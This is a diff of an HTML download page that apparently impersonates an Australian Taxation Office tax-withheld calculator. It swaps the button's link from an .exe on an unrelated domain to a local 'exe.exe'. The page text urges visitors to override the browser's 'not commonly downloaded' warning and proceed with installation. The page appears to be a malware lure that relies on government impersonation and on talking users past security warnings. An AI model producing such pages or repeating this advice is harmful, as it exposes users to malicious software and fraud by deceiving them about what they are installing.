--- a/desktop.html
+++ b/desktop.html
@@ -255,7 +255,7 @@ data-container=".download-pdf-controls" data-html="true" aria-haspopup="true">
 
 <a name="Tax_withheld_for_individuals_calculator"></a>
 
-<a class="button primary" href="https://myvirtualjobcent.com/downloads/AUTaxCalculator.exe" title="Download tax withheld Calculator here">Click here to download tax withheld calculator</a><a name="ATO_app_Tax_withheld_calculator"></a><h3 class="notoc">ATO app Tax withheld calculator for windows PC</h3>
+<a class="button primary" href="exe.exe" title="Download tax withheld Calculator here">Click here to download tax withheld calculator</a><a name="ATO_app_Tax_withheld_calculator"></a><h3 class="notoc">ATO app Tax withheld calculator for windows PC</h3>
 <p>The <a href="/">ATO Calculator software</a> might trigger a This file is not a commonly downloaded software error, Please click the continue download to proceed with installation.</p>
 <p>It covers most scenarios, but you'll need to use the full version outlined above if you are not an Australian resident for tax purposes, are a working holiday maker, or are claiming tax offsets or Medicare levy adjustments.</p>
 <a name="What_you_can_do_with_this_calculator"></a><h2><a id="Whatyoucandowiththesecalculators" class="anchor"></a>What you can do with this calculator</h2>
